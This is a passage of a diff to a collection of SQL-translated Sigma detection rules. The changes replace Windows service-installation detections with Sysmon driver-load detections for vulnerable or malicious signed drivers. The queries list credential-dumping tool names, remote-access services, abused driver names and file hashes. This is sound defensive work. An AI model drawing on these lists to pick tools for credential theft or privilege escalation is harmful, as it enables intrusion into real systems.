'1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b')))" ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", "status": "experimental", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" ], - "filename": "win_system_mal_creddumper.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "status": "test", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1210", - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], - "level": "critical", + "falsepositives": [ + "There is a relevant set of false positives depending on applications in the environment" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "status": "test", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Anydesk Remote Access Software Service Installation", - "id": "530a6faa-ff3d-4022-b315-50828e77eef5", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Legitimate usage of the anydesk tool" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" ], - "filename": "win_system_service_install_anydesk.yml" + "filename": "driver_load_win_mal_poortry_driver.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - System", - "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali", + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "win_system_service_install_remote_access_software.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New PDQDeploy Service - Server Side", - "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" ], - "filename": "win_system_service_install_pdqdeploy.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "PsExec Service Installation", - "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "author": "Thomas Patzke", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'PSEXESVC' AND ImagePath LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\') OR (EventID = '7036' AND ServiceName = 'PSEXESVC')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" ], - "filename": "win_system_service_install_psexec.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Vulnerable Driver Load By Name", + "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the load of known vulnerable drivers via their names only.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\mtcbsv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gameink.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\81.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sense5ext.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gvcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lurker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\enetechio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows8-10-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\corsairllaccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winflash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\paniox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blackbonedrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutildrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\my.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ni.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2cio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\protects.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netproxydriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64\\_w10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsmartconnectdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdryzenmasterdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmix64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nchgbios2x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrsh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lha.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blacklotus\\_driver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ucorew64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows7-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\otipcibus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows-xp-64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswarpot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdpowerprofiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tgsafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrrapidstartdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lv561av.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asribdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b1.sys' ESCAPE '\\' OR 